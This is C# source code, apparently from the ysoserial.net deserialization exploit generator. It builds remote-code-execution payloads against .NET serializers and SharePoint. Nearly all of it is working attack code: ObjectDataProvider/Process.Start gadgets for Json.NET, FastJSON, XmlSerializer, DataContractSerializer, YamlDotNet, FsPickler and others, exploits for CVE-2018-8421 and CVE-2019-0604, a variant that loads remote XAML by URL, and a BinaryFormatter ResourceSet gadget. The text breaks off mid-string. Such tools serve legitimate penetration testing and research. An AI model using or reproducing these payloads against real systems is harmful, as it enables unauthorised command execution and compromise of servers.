public string CVE_2018_8421() { string payload = ""; if (useurl) { payload = @"<?xml version=""1.0"" encoding=""utf-8""?> <soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[ <SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow""> <Rd:ResourceDictionary xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" Source=""" + cmd + @"""/> </SequentialWorkflowActivity> ]]></workflowMarkupText> <rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>"; } else { Boolean hasArgs; string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs); String cmdPart; if (hasArgs) { cmdPart = $@"<Diag:ProcessStartInfo FileName=""" + splittedCMD[0] + @""" Arguments=""" + splittedCMD[1] + @""">"; } else { cmdPart = $@"<Diag:ProcessStartInfo FileName=""" + splittedCMD[0] + @""">"; } payload = @"<?xml version=""1.0"" encoding=""utf-8""?> <soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[ <SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow""> <Rd:ResourceDictionary xmlns:System=""clr-namespace:System;assembly=mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" xmlns:ODP=""clr-namespace:System.Windows.Data;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <ODP:ObjectDataProvider x:Key=""LaunchCmd"" MethodName=""Start""> <ObjectDataProvider.ObjectInstance><Diag:Process><Diag:Process.StartInfo>" + cmdPart + @"</Diag:ProcessStartInfo></Diag:Process.StartInfo></Diag:Process> </ObjectDataProvider.ObjectInstance> </ODP:ObjectDataProvider> </Rd:ResourceDictionary> </SequentialWorkflowActivity> ]]></workflowMarkupText> <rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>"; } // minimisation of payload is not important here but we can do it if needed! return(payload); }
public string CVE_2019_0604() { Boolean hasArgs; string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs); String cmdPart; if (hasArgs) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>"; } string payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:"; /* * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema""> * <ExpandedElement/> * <ProjectedProperty0> * <MethodName>Parse</MethodName> * <MethodParameters> * <anyType xsi:type=""xsd:string""> * <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> * </anyType> * </MethodParameters> * <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> * </ProjectedProperty0> * </ExpandedWrapperOfXamlReaderObjectDataProvider>"; * //*/ string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>"; payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding //Console.WriteLine(payloadPart2); string payload = payloadPart1 + payloadPart2; StringBuilder stringBuilder = new StringBuilder(); stringBuilder.Append("__bp"); HexEncode(checked ((char)(payload.Length << 2)), stringBuilder); HexEncode(payload, stringBuilder); return(stringBuilder.ToString()); }
public override object Generate(string formatter, InputArgs inputArgs) { // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml if (formatter.ToLower().Equals("xaml")) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = inputArgs.CmdFileName; if (inputArgs.HasArguments) { psi.Arguments = inputArgs.CmdArguments; } StringDictionary dict = new StringDictionary(); psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict); Process p = new Process(); p.StartInfo = psi; ObjectDataProvider odp = new ObjectDataProvider(); odp.MethodName = "Start"; odp.IsInitialLoadEnabled = false; odp.ObjectInstance = p; string payload = ""; if (variant_number == 2) { ResourceDictionary myResourceDictionary = new ResourceDictionary(); myResourceDictionary.Add("", odp); // XAML serializer can also be exploited! payload = SerializersHelper.Xaml_serialize(myResourceDictionary); } else if (variant_number == 3) { if (xaml_url == "") { Console.WriteLine("Url parameter was not provided."); Console.WriteLine("Try 'ysoserial --fullhelp' for more information."); System.Environment.Exit(-1); } // There are loads of other objects in Presentation that use XAML URLs and they can be used here instead payload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" Source=""" + xaml_url + @"""/>"; } else if (variant_number == 4) { inputArgs.IsSTAThread = true; // we need STAThreadAttribute here string bridge = SerializersHelper.Xaml_serialize(odp); if (inputArgs.Minify) { // using discardable regex array to make it shorter! bridge = XMLMinifier.Minify(bridge, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " }); } // There are loads of other objects in Presentation that use ResourceDictionary and they can all be used here instead payload = @"<WorkflowDesigner xmlns=""clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"" PropertyInspectorFontAndColorData=""" + CommandArgSplitter.XmlStringAttributeEscape(bridge) + @"""/>"; } else { //payload = XamlWriter.Save(odp); payload = SerializersHelper.Xaml_serialize(odp); } if (inputArgs.Minify) { // using discardable regex array to make it shorter! payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " }); } if (inputArgs.Test) { if (inputArgs.IsSTAThread) { var staThread = new System.Threading.Thread(delegate() { try { SerializersHelper.Xaml_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } }); staThread.SetApartmentState(System.Threading.ApartmentState.STA); staThread.Start(); staThread.Join(); } else { try { SerializersHelper.Xaml_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } } return(payload); } if (formatter.ToLower().Equals("json.net")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; string cmdPart = ""; if (inputArgs.HasArguments) { cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':[" + cmdPart + @"] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("fastjson")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @""""; } else { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""""; } String payload = @"{ ""$types"":{ ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"", ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"", ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3"" }, ""$type"":""1"", ""ObjectInstance"":{ ""$type"":""2"", ""StartInfo"":{ ""$type"":""3"", " + cmdPart + @" } }, ""MethodName"":""Start"" }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var instance = JSON.ToObject <Object>(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("javascriptserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'ObjectInstance':{ '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'StartInfo': { '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.JavaScriptSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("xmlserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" > <ExpandedElement/> <ProjectedProperty0> <MethodName>Parse</MethodName> <MethodParameters> <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </MethodParameters> <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProvider> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true); } if (inputArgs.Test) { try { SerializersHelper.XMLSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart, payload; if (variant_number == 2) { if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> "; } else if (variant_number == 3) { payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">xxxxx</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> "; } else { if (inputArgs.HasArguments) { cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType> <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>"; } else { cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>"; } payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:c=""http://www.w3.org/2001/XMLSchema"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" > <ExpandedElement z:Id=""ref1"" > <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Start</a:MethodName> <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> " + cmdPart + @" </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> </root> "; } if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("yamldotnet")) { inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"FileName: " + inputArgs.CmdFileName + @", Arguments: " + inputArgs.CmdArguments; } else { cmdPart = $@"FileName: " + inputArgs.CmdFileName; } String payload = @" !<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> { MethodName: Start, ObjectInstance: !<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { StartInfo: !<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = YamlDocumentMinifier.Minify(payload); } if (inputArgs.Test) { try { SerializersHelper.YamlDotNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("fspickler")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>"; internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload); String payload = @"{ ""FsPickler"": ""4.0.0"", ""type"": ""System.Object"", ""value"": { ""_flags"": ""subtype"", ""subtype"": { ""Case"": ""NamedType"", ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"", ""Assembly"": { ""Name"": ""Microsoft.PowerShell.Editor"", ""Version"": ""3.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""31bf3856ad364e35"" } }, ""instance"": { ""serializationEntries"": [ { ""Name"": ""ForegroundBrush"", ""Type"": { ""Case"": ""NamedType"", ""Name"": ""System.String"", ""Assembly"": { ""Name"": ""mscorlib"", ""Version"": ""4.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""b77a5c561934e089"" } }, ""Value"": """ + internalPayload + @""" } ] } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true); serializer.UnPickleOfString <Object>(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLowerInvariant().Equals("sharpserializerbinary")) { // Binary Serialization Mode object serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Serialize(inputArgs.Cmd); if (inputArgs.Test) { SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Deserialize(serializedData); } return(serializedData); } else if (formatter.ToLowerInvariant().Equals("sharpserializerxml")) { // XML Serialization Mode string serializedData = (string)SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd); if (inputArgs.Test) { SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Deserialize(serializedData); } return(serializedData); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { /* * // This is how ResourceSet can be used directly but the payload would fire! * object generatedPayload = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs); * * using (ResourceWriter rw = new ResourceWriter(@".\ResourceSetGenerator.resources")) * { * rw.AddResource("", generatedPayload); * rw.Generate(); * rw.Close(); * } * * // Payload will be executed once here which is annoying but without surgical insertion or something to parse binaryformatter objects, it is quite hard to prevent this * ResourceSet myResourceSet = new ResourceSet(@".\ResourceSetGenerator.resources"); * * // TextFormattingRunPropertiesGenerator is the preferred method due to its short length. However, we need to insert it manually into a serialized object as ResourceSet cannot tolerate it * * //*/ //TestMore(inputArgs); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)) { string payload = ""; // This to prevent code execution when running byte[] bfSerializedObj; if (internalgadget == 1) { // This is an example of using SimpleBinaryFormatterParser // string obj25Type = "", obj25Value = "", obj26Value = ""; byte[] cmdFile7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdFileName); byte[] obj26ValueObjId = new byte[] { 0x0c, 0, 0, 0 }; obj26Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj26ValueObjId, cmdFile7bitLV)); if (inputArgs.HasArguments) { byte[] obj25TypeByte = new byte[] { 0x06 }; byte[] obj25ValueObjId = new byte[] { 0x0b, 0, 0, 0 }; byte[] cmdArgs7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdArguments); obj25Type = Convert.ToBase64String(obj25TypeByte); obj25Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj25ValueObjId, cmdArgs7bitLV)); } else { byte[] obj25TypeByte = new byte[] { 0x09 }; byte[] obj25ValueObjId = new byte[] { 0x05, 0, 0, 0 }; obj25Type = Convert.ToBase64String(obj25TypeByte); obj25Value = Convert.ToBase64String(obj25ValueObjId); } payload = @"{'headerBytes':'AAEAAAD/////AQAAAAAAAAA=','binaryFormatterObjects':[{'orderId':1,'typeBytes':'BA==','valueBytes':'AQAAABxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlU2V0AgAAAAVUYWJsZRVfY2FzZUluc2Vuc2l0aXZlVGFibGUDAxxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlHFN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU='},{'orderId':2,'typeBytes':'CQ==','valueBytes':'AgAAAA=='},{'orderId':3,'typeBytes':'Cg==','valueBytes':''},{'orderId':4,'typeBytes':'BA==','valueBytes':'AgAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgg='},{'orderId':5,'typeBytes':null,'valueBytes':'7FE4Pw=='},{'orderId':6,'typeBytes':null,'valueBytes':'AQAAAA=='},{'orderId':7,'typeBytes':'Cg==','valueBytes':''},{'orderId':8,'typeBytes':'Cg==','valueBytes':''},{'orderId':9,'typeBytes':null,'valueBytes':'AwAAAA=='},{'orderId':10,'typeBytes':'CQ==','valueBytes':'AwAAAA=='},{'orderId':11,'typeBytes':'CQ==','valueBytes':'BAAAAA=='},{'orderId':12,'typeBytes':'EA==','valueBytes':'AwAAAAEAAAA='},{'orderId':13,'typeBytes':'Bg==','valueBytes':'BQAAAAA='},{'orderId':14,'typeBytes':'EA==','valueBytes':'BAAAAAEAAAA='},{'orderId':15,'typeBytes':'CQ==','valueBytes':'BgAAAA=='},{'orderId':16,'typeBytes':'DA==','valueBytes':'BwAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':17,'typeBytes':'BQ==','valueBytes':'BgAAAEBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Tb3J0ZWRTZXRgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABghJU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdXQgHAAAA'},{'orderId':18,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':19,'typeBytes':'CQ==','valueBytes':'CAAAAA=='},{'orderId':20,'typeBytes':null,'valueBytes':'AgAAAA=='},{'orderId':21,'typeBytes':'CQ==','valueBytes':'CQAAAA=='},{'orderId':22,'typeBytes':'BA==','valueBytes':'CAAAAElTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dAQAAAAtfY29tcGFyaXNvbgMiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcg=='},{'orderId':23,'typeBytes':'CQ==','valueBytes':'